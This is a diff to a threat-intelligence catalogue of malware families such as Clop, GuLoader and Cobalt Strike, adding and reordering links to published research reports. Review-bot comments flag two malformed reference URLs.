 "https://unit42.paloaltonetworks.com/remediation-steps-for-the-Microsoft-Exchange-Server-vulnerabilities/",
 "https://www.reddit.com/r/msp/comments/lwmo5c/mass_exploitation_of_onprem_exchange_servers",
 "https://www.fireeye.com/blog/threat-research/2019/08/game-over-detecting-and-stopping-an-apt41-operation.html",
@@ -11161,7 +12730,7 @@
 "value": "Chinad"
 },
 {
- "description": "",
+ "description": "Ransomware.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.chinajm",
@@ -11171,7 +12740,7 @@
 "type": []
 },
 "uuid": "ef216f1d-9ee5-4676-ae34-f954a8611290",
- "value": "ChinaJm Ransomware"
+ "value": "ChinaJm"
 },
 {
 "description": "",
@@ -11211,6 +12780,7 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.chthonic",
 "https://www.proofpoint.com/us/threat-insight/post/threat-actors-using-legitimate-paypal-accounts-to-distribute-chthonic-banking-trojan",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
 "https://securelist.com/chthonic-a-new-modification-of-zeus/68176/",
 "https://bartblaze.blogspot.com/2017/08/crystal-finance-millennium-used-to.html"
 ],
@@ -11242,6 +12812,7 @@
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.cinobi",
 "http://www.pwncode.io/2019/12/unpacking-payload-used-in-bottle-ek.html",
 "https://documents.trendmicro.com/assets/pdf/Tech%20Brief_Operation%20Overtrap%20Targets%20Japanese%20Online%20Banking%20Users.pdf",
+ "https://www.trendmicro.com/en_us/research/21/h/cinobi-banking-trojan-targets-users-of-cryptocurrency-exchanges-.html",
 "https://blog.trendmicro.com/trendlabs-security-intelligence/operation-overtrap-targets-japanese-online-banking-users-via-bottle-exploit-kit-and-brand-new-cinobi-banking-trojan/"
 ],
 "synonyms": [],
@@ -11255,8 +12826,10 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.citadel",
- "http://www.xylibox.com/2016/02/citadel-0011-atmos.html",
 "https://vx-underground.org/archive/APTs/2017/2017.12.11/Money%20Taker.pdf",
+ "http://www.xylibox.com/2016/02/citadel-0011-atmos.html",
+ "https://www.justice.gov/opa/pr/four-individuals-plead-guilty-rico-conspiracy-involving-bulletproof-hosting-cybercriminals",
+ "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree",
 "http://blog.jpcert.or.jp/2016/02/banking-trojan--27d6.html",
 "https://blog.malwarebytes.com/threat-analysis/2012/11/citadel-a-cyber-criminals-ultimate-weapon/"
 ],
@@ -11341,45 +12914,69 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.clop",
 "https://www.fireeye.com/blog/threat-research/2021/02/accellion-fta-exploited-for-data-theft-and-extortion.html",
- "https://www.telekom.com/en/blog/group/article/inside-of-cl0p-s-ransomware-operation-615824",
+ "https://www.splunk.com/en_us/blog/security/detecting-clop-ransomware.html",
+ "https://www.vice.com/en/article/wx5eyx/meet-the-ransomware-gang-behind-one-of-the-biggest-supply-chain-hacks-ever",
 "https://actu.fr/normandie/rouen_76540/une-rancon-apres-cyberattaque-chu-rouen-ce-reclament-pirates_29475649.html",
+ "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
 "https://www.cert.ssi.gouv.fr/cti/CERTFR-2019-CTI-009/",
+ "https://www.bleepingcomputer.com/news/security/indiabulls-group-hit-by-clop-ransomware-gets-24h-leak-deadline/",
 "https://medium.com/@Sebdraven/unpacking-clop-416b83718e0f",
+ "https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-xakerske-ugrupovannya-u-rozpovsyudzhenni-virusu-shifruvalnika-ta-nanesenni-inozemnim-kompaniyam-piv-milyarda-dolariv-zbitkiv/",
+ "https://www.telekom.com/en/blog/group/article/inside-of-cl0p-s-ransomware-operation-615824",
 "https://blog.sensecy.com/2020/08/20/global-ransomware-attacks-in-2020-the-top-4-vulnerabilities/",
 "https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/",
- "https://www.bleepingcomputer.com/news/security/indiabulls-group-hit-by-clop-ransomware-gets-24h-leak-deadline/",
+ "https://www.splunk.com/en_us/blog/security/clop-ransomware-detection-threat-research-release-april-2021.html",
+ "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/",
 "https://www.bleepingcomputer.com/news/security/ta505-hackers-behind-maastricht-university-ransomware-attack/",
 "https://github.com/albertzsigovits/malware-notes/blob/master/Clop.md",
+ "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://www.flashpoint-intel.com/blog/cl0p-and-revil-escalate-their-ransomware-tactics/",
 "https://github.com/Tera0017/TAFOF-Unpacker",
+ "https://asec.ahnlab.com/en/19542/",
 "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
 "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
 "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
 "https://www.hornetsecurity.com/en/security-information/clop-clop-ta505-html-malspam-analysis/",
 "https://www.bleepingcomputer.com/news/security/ransomware-gang-says-they-stole-2-million-credit-cards-from-e-land/",
 "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
+ "https://www.bleepingcomputer.com/news/security/ransomware-gang-urges-victims-customers-to-demand-a-ransom-payment/",
 "https://github.com/albertzsigovits/malware-notes/blob/master/Ransomware/Clop.md",
 "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf",
 "https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Publikationen/Lageberichte/Lagebericht2020.pdf?__blob=publicationFile&v=2",
 "https://www.notion.so/S2W-LAB-Analysis-of-Clop-Ransomware-suspiciously-related-to-the-Recent-Incident-English-088056baf01242409a6e9f844f0c5f2e",
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-double-extortion-and-beyond-revil-clop-and-conti",
 "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf",
+ "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound",
 "https://www.zdnet.com/article/croatias-largest-petrol-station-chain-impacted-by-cyber-attack/",
 "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/",
+ "https://www.youtube.com/watch?v=PqGaZgepNTE",
+ "https://www.secureworks.com/research/threat-profiles/gold-tahoe",
+ "https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/",
+ "https://www.advanced-intel.com/post/adversarial-perspective-advintel-breach-avoidance-through-monitoring-initial-vulnerabilities",
 "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672",
 "https://www.telekom.com/en/blog/group/article/eager-beaver-a-short-overview-of-the-restless-threat-actor-ta505-609546",
+ "https://www.carbonblack.com/blog/cb-tau-threat-intelligence-notification-cryptomix-clop-ransomware-disables-startup-repair-removes-edits-shadow-volume-copies/",
 "https://labs.sentinelone.com/breaking-ta505s-crypter-with-an-smt-solver/",
- "https://www.secureworks.com/research/threat-profiles/gold-tahoe",
+ "https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do",
+ "https://asec.ahnlab.com/wp-content/uploads/2021/01/Analysis_ReportCLOP_Ransomware.pdf",
+ "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/",
 "https://www.zdnet.com/article/german-tech-giant-software-ag-down-after-ransomware-attack/",
 "https://twitter.com/darb0ng/status/1338692764121251840",
+ "https://www.binance.com/en/blog/421499824684902240/Binance-Helps-Take-Down-Cybercriminal-Ring-Laundering-%24500M-in-Ransomware-Attacks",
 "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/",
 "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-returns-with-a-new-bag-of-tricks-602104",
 "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/clop-ransomware/",
 "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
 "https://www.notion.so/S2W-LAB-Analysis-of-Clop-Ransomware-suspiciously-related-to-the-Recent-Incident-c26daec604da4db6b3c93e26e6c7aa26",
- "https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do",
+ "https://therecord.media/ukrainian-police-arrest-clop-ransomware-members-seize-server-infrastructure/",
 "https://medium.com/s2wlab/operation-synctrek-e5013df8d167",
 "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf",
 "https://blog.fox-it.com/2020/11/16/ta505-a-brief-history-of-their-time/",
- "https://www.bleepingcomputer.com/news/security/cryptomix-clop-ransomware-says-its-targeting-networks-not-computers/"
+ "https://krebsonsecurity.com/2021/06/ukrainian-police-nab-six-tied-to-clop-ransomware/",
+ "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html",
+ "https://www.boho.or.kr/filedownload.do?attach_file_seq=2808&attach_file_id=EpF2808.pdf",
+ "https://www.bleepingcomputer.com/news/security/cryptomix-clop-ransomware-says-its-targeting-networks-not-computers/",
+ "https://unit42.paloaltonetworks.com/clop-ransomware/"
 ],
 "synonyms": [],
 "type": []
@@ -11392,6 +12989,7 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye",
+ "https://hidocohen.medium.com/guloaders-anti-analysis-techniques-e0d4b8437195",
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.guloader",
 "https://labs.vipre.com/unloading-the-guloader/",
 "https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter",
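Review bot: The added Clop reference `https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3` points at a user-owned, editable Google Sheet with no durable copy, unlike the cisoclub.ru report, which this same hunk records a second time through a web.archive.org snapshot. The document id also looks shorter than the ids Google Sheets usually issues, so it may have been truncated when pasted. Please confirm the link resolves and, if it is worth keeping as a source, pair it with an archive snapshot as was done for cisoclub; otherwise drop it. The `refs` array here starts at the top of this hunk and closes inside it, so the fix is local to these lines.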
@@ -11408,20 +13006,27 @@
 "https://twitter.com/TheEnergyStory/status/1239110192060608513",
 "https://twitter.com/VK_Intel/status/1252678206852907011",
 "https://www.proofpoint.com/us/blog/threat-insight/hakbit-ransomware-campaign-against-germany-austria-switzerland",
+ "https://cert.pl/en/posts/2021/04/keeping-an-eye-on-guloader-reverse-engineering-the-loader/",
 "https://twitter.com/sysopfb/status/1258809373159305216",
 "https://research.checkpoint.com/2020/guloader-cloudeye/",
 "https://www.proofpoint.com/us/threat-insight/post/coronavirus-threat-landscape-update",
 "https://www.joesecurity.org/blog/3535317197858305930",
 "https://www.proofpoint.com/us/threat-insight/post/guloader-popular-new-vb6-downloader-abuses-cloud-services",
 "https://twitter.com/VK_Intel/status/1257206565146370050",
+ "https://www.youtube.com/watch?v=-FxyzuRv6Wg",
 "https://blog.morphisec.com/guloader-the-rat-downloader",
 "https://research.checkpoint.com/2020/threat-actors-migrating-to-the-cloud/",
 "https://twitter.com/TheEnergyStory/status/1240608893610459138",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
+ "https://elis531989.medium.com/dancing-with-shellcodes-cracking-the-latest-version-of-guloader-75083fb15cb4",
+ "https://www.youtube.com/watch?v=K3Yxu_9OUxU",
 "https://www.crowdstrike.com/blog/guloader-malware-analysis/",
 "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/research/playing-with-guloader-anti-vm-techniques-malware/",
 "https://malwation.com/malware-config-extraction-diaries-1-guloader/",
+ "https://www.youtube.com/watch?v=N0wAh26wShE",
 "https://clickallthethings.wordpress.com/2021/03/06/oleobject1-bin-ole10native-shellcode/",
- "https://labs.k7computing.com/?p=20156"
+ "https://labs.k7computing.com/?p=20156",
+ "https://labs.k7computing.com/?p=21725Lokesh"
 ],
 "synonyms": [
 "GuLoader",
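Review bot: The added reference `"https://labs.k7computing.com/?p=21725Lokesh"` has what looks like an author name pasted onto the end of the query string; the preceding entry `?p=20156` shows that `p` carries a numeric post id, so the URL as written will not resolve to the intended post. It should read `"https://labs.k7computing.com/?p=21725"`. Worth a quick scan of the rest of the commit for the same copy-paste artefact, since refs in this file are consumed verbatim by MISP instances.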
@@ -11493,179 +13098,353 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike", - "https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/", - "https://www.brighttalk.com/webcast/7451/462719", - "https://github.com/JPCERTCC/aa-tools/blob/master/cobaltstrikescan.py", - "https://twitter.com/ffforward/status/1324281530026524672", - "https://community.riskiq.com/article/0bcefe76", - "https://www.hhs.gov/sites/default/files/bazarloader.pdf", - "https://orangematter.solarwinds.com/2021/01/11/new-findings-from-our-investigation-of-sunburst/", - "https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html", - "https://medium.com/walmartglobaltech/nimar-loader-4f61c090c49e", + "https://www.advanced-intel.com/post/secret-backdoor-behind-conti-ransomware-operation-introducing-atera-agent", + "https://decoded.avast.io/threatintel/decoding-cobalt-strike-understanding-payloads/", + "https://www.zscaler.com/blogs/research/targeted-attack-leverages-india-china-border-dispute-lure-victims", "https://github.com/Sentinel-One/CobaltStrikeParser/blob/master/parse_beacon_config.py", "https://blog.talosintelligence.com/2020/06/indigodrop-maldocs-cobalt-strike.html", "https://www.secureworks.com/research/threat-profiles/bronze-president", - "https://blog.macnica.net/blog/2020/11/dtrack.html", - "https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html", - "https://malwareandstuff.com/mustang-panda-joins-the-covid19-bandwagon/", - "https://github.com/blackorbird/APT_REPORT/blob/master/Oceanlotus/apt32_report_2019.pdf", - "https://securelist.com/apt-trends-report-q2-2020/97937/", - "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", - "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", - 
"https://medium.com/cycraft/taiwan-high-tech-ecosystem-targeted-by-foreign-apt-group-5473d2ad8730", - "https://isc.sans.edu/diary/26752", + "https://www.trendmicro.com/en_us/research/21/g/biopass-rat-new-malware-sniffs-victims-via-live-streaming.html", + "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-dianxun.pdf", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/diving-deeper-into-the-kaseya-vsa-attack-revil-returns-and-other-hackers-are-riding-their-coattails/", + "https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Tseng-Mem2Img-Memory-Resident-Malware-Detection-via-Convolution-Neural-Network.pdf", + "https://www.0ffset.net/reverse-engineering/malware-analysis/squirrelwaffle-main-loader/", "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations.pdf", - "https://www2.deloitte.com/content/dam/Deloitte/dk/Documents/Grabngo/Aarhus_miniseminar_291118.pdf", - "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", - "https://twitter.com/TheDFIRReport/status/1356729371931860992", - "https://research.checkpoint.com/2019/rancor-the-year-of-the-phish/", - "http://blog.morphisec.com/new-global-attack-on-point-of-sale-systems", - "https://research.nccgroup.com/2020/06/15/striking-back-at-retired-cobalt-strike-a-look-at-a-legacy-vulnerability/", - "https://401trg.com/burning-umbrella/ ", - "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-268a", + "https://www.sans.org/webcasts/contrarian-view-solarwinds-119515", + "https://www.fireeye.com/blog/threat-research/2021/06/darkside-affiliate-supply-chain-software-compromise.html", "https://www.advanced-intel.com/post/anatomy-of-attack-inside-bazarbackdoor-to-ryuk-ransomware-one-group-via-cobalt-strike", "https://github.com/sophos-cybersecurity/solarwinds-threathunt", - "https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/China/APT/Chimera/Analysis.md", - 
"https://twitter.com/AltShiftPrtScn/status/1350755169965924352", - "https://asec.ahnlab.com/ko/19860/", - "https://www.youtube.com/watch?v=gfYswA_Ronw", - "https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html", + "https://www.huntress.com/blog/cobalt-strike-analysis-of-obfuscated-malware", + "https://twitter.com/AltShiftPrtScn/status/1385103712918642688", "https://talos-intelligence-site.s3.amazonaws.com/production/document_files/files/000/095/031/original/Talos_Cobalt_Strike.pdf", - "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf", - "https://dansec.medium.com/detecting-malicious-c2-activity-spawnas-smb-lateral-movement-in-cobaltstrike-9d518e68b64", - "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/5/", + "https://sergiusechel.medium.com/improving-the-network-based-detection-of-cobalt-strike-c2-servers-in-the-wild-while-reducing-the-6964205f6468", + "https://www.microsoft.com/security/blog/2020/11/30/threat-actor-leverages-coin-miner-techniques-to-stay-under-the-radar-heres-how-to-spot-them/", "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout", "https://quake.360.cn/quake/#/reportDetail?id=5fc6fedd191038c3b25c4950", - "https://github.com/ThreatConnect-Inc/research-team/blob/master/IOCs/WizardSpider-UNC1878-Ryuk.csv", - "https://www.carbonblack.com/2020/03/26/the-dukes-of-moscow/", - "https://www.zscaler.com/blogs/research/targeted-attack-leverages-india-china-border-dispute-lure-victims", - "https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/", - "https://blog.securehat.co.uk/malware-analysis/extracting-the-cobalt-strike-config-from-a-teardrop-loader", - "https://thedfirreport.com/2020/04/24/ursnif-via-lolbins/", - 
"https://blog.truesec.com/2020/12/22/collaboration-between-fin7-and-the-ryuk-group-a-truesec-investigation/", + "https://svch0st.medium.com/stats-from-hunting-cobalt-strike-beacons-c17e56255f9b", + "https://www.sekoia.io/en/hunting-and-detecting-cobalt-strike/", + "https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html", + "https://www.guidepointsecurity.com/blog/a-ransomware-near-miss-proxyshell-a-rat-and-cobalt-strike/", + "https://blueteamblog.com/darkside-ransomware-operations-preventions-and-detections", "https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/", - "https://teamt5.org/tw/posts/mjib-holds-briefing-on-chinese-hackers-attacks-on-taiwanese-government-agencies/", - "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/", - "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations-wp.pdf", - "https://malwarelab.eu/posts/fin6-cobalt-strike/", + "https://unit42.paloaltonetworks.com/hancitor-infections-cobalt-strike/", "https://labs.sentinelone.com/egregor-raas-continues-the-chaos-with-cobalt-strike-and-rclone/", - "https://github.com/AmnestyTech/investigations/tree/master/2021-02-24_vietnam", - "https://www.picussecurity.com/resource/blog/ttps-used-in-the-solarwinds-breach", - "https://www.secureworks.com/research/threat-profiles/bronze-mohawk", + "https://www.secureworks.com/blog/hades-ransomware-operators-use-distinctive-tactics-and-infrastructure", + "https://cybleinc.com/2020/11/17/oceanlotus-continues-with-its-cyber-espionage-operations/", + "https://securityscorecard.com/blog/securityscorecard-finds-usaid-hack-much-larger-than-initially-thought", "https://www.bleepingcomputer.com/news/security/fake-microsoft-teams-updates-lead-to-cobalt-strike-deployment/", - 
"https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/", - "https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/operation-drbcontrol-uncovering-a-cyberespionage-campaign-targeting-gambling-companies-in-southeast-asia", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", - "https://shells.systems/in-memory-shellcode-decoding-to-evade-avs/", - "https://pkb1s.github.io/Relay-attacks-via-Cobalt-Strike-beacons/", - "https://www.wired.com/story/chinese-hackers-taiwan-semiconductor-industry-skeleton-key/", - "https://blog.cobaltstrike.com/2021/02/09/learn-pipe-fitting-for-all-of-your-offense-projects/", + "https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html", "https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/", "https://blog.fox-it.com/2021/01/12/abusing-cloud-services-to-fly-under-the-radar/", - "https://news.sophos.com/en-us/2020/10/27/mtr-casebook-an-active-adversary-caught-in-the-act/", "https://unit42.paloaltonetworks.com/fireeye-solarstorm-sunburst/", - "https://medium.com/walmartglobaltech/investigation-into-the-state-of-nim-malware-14cc543af811", - "https://blog.malwarebytes.com/threat-analysis/2020/06/multi-stage-apt-attack-drops-cobalt-strike-using-malleable-c2-feature/", - "https://labs.f-secure.com/blog/detecting-cobalt-strike-default-modules-via-named-pipe-analysis", - "https://www.wilbursecurity.com/2020/03/trickbot-to-ryuk-in-two-hours/", - "https://isc.sans.edu/diary/rss/26862", - "https://isc.sans.edu/diary/rss/27176", + "https://www.blackarrow.net/leveraging-microsoft-teams-to-persist-and-cover-up-cobalt-strike-traffic/", "https://www.pentestpartners.com/security-blog/cobalt-strike-walkthrough-for-red-teamers/", - "https://www.microsoft.com/security/blog/2020/11/30/threat-actor-leverages-coin-miner-techniques-to-stay-under-the-radar-heres-how-to-spot-them/", - 
"https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_201_haruyama_jp.pdf", - "https://isc.sans.edu/forums/diary/Excel+spreadsheets+push+SystemBC+malware/27060/", - "https://blog.malwarebytes.com/threat-analysis/2020/07/chinese-apt-group-targets-india-and-hong-kong-using-new-variant-of-mgbot-malware/", - "https://community.riskiq.com/article/f0320980", - "https://www.advanced-intel.com/post/front-door-into-bazarbackdoor-stealthy-cybercrime-weapon", - "https://content.fireeye.com/m-trends/rpt-m-trends-2020", - "https://lab52.io/blog/the-energy-reserves-in-the-eastern-mediterranean-sea-and-a-malicious-campaign-of-apt10-against-turkey/", - "https://blog.talosintelligence.com/2020/09/CTIR-quarterly-trends-Q4-2020.html", - "https://www.splunk.com/en_us/blog/security/cloud-federated-credential-abuse-cobalt-strike-threat-research-feb-2021.html", - "https://www.wired.com/story/russias-fancy-bear-hack-us-federal-agency/", - "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", - "https://engineering.salesforce.com/easily-identify-malicious-servers-on-the-internet-with-jarm-e095edac525a", - "https://www.secureworks.com/research/threat-profiles/tin-woodlawn", - "https://www.fintechsecurity.com.hk/slides/01.Dmitry-Annual-Group-IB-report-High-Tech-Crime-Trends.pdf", - "https://blogs.vmware.com/networkvirtualization/2020/11/trick-or-threat-ryuk-ransomware-targets-the-health-care-industry.html/", - "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/", - "https://github.com/Apr4h/CobaltStrikeScan", - "https://twitter.com/VK_Intel/status/1294320579311435776", - "https://labs.sentinelone.com/the-anatomy-of-an-apt-attack-and-cobaltstrike-beacons-encoded-configuration/", - "https://unit42.paloaltonetworks.com/fireeye-red-team-tool-breach/", - "https://blog.netlab.360.com/blackrota-an-obfuscated-backdoor-written-in-go/", - 
"https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", - "https://www.trendmicro.com/en_us/research/20/i/u-s--justice-department-charges-apt41-hackers-over-global-cyberattacks.html", - "https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/", - "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", - "https://www.trustedsec.com/blog/tailoring-cobalt-strike-on-target/", - "https://haggis-m.medium.com/malleable-c2-profiles-and-you-7c7ab43e7929", - "https://www.secureworks.com/research/threat-profiles/gold-niagara", - "https://news.sophos.com/en-us/2020/10/14/inside-a-new-ryuk-ransomware-attack/", - "https://thedfirreport.com/2021/03/08/bazar-drops-the-anchor/", - "https://securelist.com/apt-trends-report-q3-2020/99204/", - "https://blog.cobaltstrike.com/2020/12/08/a-red-teamer-plays-with-jarm/", - "https://github.com/swisscom/detections/blob/main/RYUK/cobaltstrike_c2s.txt", - "https://www.darktrace.com/en/blog/catching-apt-41-exploiting-a-zero-day-vulnerability/", + "https://medium.com/walmartglobaltech/trickbot-crews-new-cobaltstrike-loader-32c72b78e81c", + "http://www.secureworks.com/research/threat-profiles/gold-drake", + "https://blog.talosintelligence.com/2021/05/ctir-case-study.html", + "https://therecord.media/mongolian-certificate-authority-hacked-eight-times-compromised-with-malware/", + "https://inteloperator.medium.com/the-default-63-6f-62-61-6c-74-strike-8ac9ee0de1b7", + "https://www.ic3.gov/Media/News/2021/210823.pdf", + "https://twitter.com/th3_protoCOL/status/1433414685299142660?s=20", + "https://thedfirreport.com/2020/04/24/ursnif-via-lolbins/", + "https://go.recordedfuture.com/hubfs/reports/mtp-2021-0914.pdf", + "https://news.sophos.com/en-us/2021/06/02/amsi-bypasses-remain-tricks-of-the-malware-trade/", + "https://labs.sentinelone.com/noblebaron-new-poisoned-installers-could-be-used-in-supply-chain-attacks/", + 
"https://www.sekoia.io/en/an-insider-insights-into-conti-operations-part-one", + "https://www.cyborgsecurity.com/blog/you-dont-know-the-hafnium-of-it/", + "https://securelist.com/apt-luminousmoth/103332/", + "https://www.volexity.com/blog/2021/05/27/suspected-apt29-operation-launches-election-fraud-themed-phishing-campaigns/", + "https://www.sekoia.io/en/an-insider-insights-into-conti-operations-part-two/", + "https://www.zscaler.com/blogs/security-research/squirrelwaffle-new-loader-delivering-cobalt-strike", + "https://thedfirreport.com/2021/06/20/from-word-to-lateral-movement-in-1-hour/", "https://www.secureworks.com/research/threat-profiles/gold-dupont", "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/", - "https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf", - "https://blogs.blackberry.com/en/2020/12/mountlocker-ransomware-as-a-service-offers-double-extortion-capabilities-to-affiliates", - "https://www.cobaltstrike.com/support", + "https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf", + "https://www.qurium.org/alerts/targeted-malware-against-crph/", "https://pylos.co/2018/11/18/cozybear-in-from-the-cold/", + "https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/", + "https://www.mdsec.co.uk/2021/07/investigating-a-suspicious-service/", + "https://www.ncsc.gov.ie/pdfs/HSE_Conti_140521_UPDATE.pdf", + "https://www.elastic.co/blog/detecting-cobalt-strike-with-memory-signatures", + "https://twitter.com/MBThreatIntel/status/1412518446013812737", + "https://www.trendmicro.com/en_us/research/21/d/hello-ransomware-uses-updated-china-chopper-web-shell-sharepoint-vulnerability.html", + "https://newtonpaul.com/analysing-fileless-malware-cobalt-strike-beacon/", + "https://www.cynet.com/understanding-squirrelwaffle/", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/new-apt-group-chamelgang", + "https://thedfirreport.com/2021/01/31/bazar-no-ryuk/", + 
"https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf", + "https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575", + "https://blog.fox-it.com/2019/02/26/identifying-cobalt-strike-team-servers-in-the-wild/", + "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", + "https://twitter.com/vikas891/status/1385306823662587905", + "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko", + "https://malwarebookreports.com/cryptone-cobalt-strike/", + "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks", + "https://www.trustnet.co.il/blog/virus-alert-to-powershell-encrypted-loader/", + "https://blog.reconinfosec.com/analysis-of-exploitation-cve-2020-10189/", + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf", + "https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://www.fortinet.com/blog/threat-research/what-we-have-learned-so-far-about-the-sunburst-solarwinds-hack", + "https://www.secureworks.com/research/threat-profiles/bronze-riverside", + "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", + "https://www.brighttalk.com/webcast/7451/462719", + "https://github.com/JPCERTCC/aa-tools/blob/master/cobaltstrikescan.py", 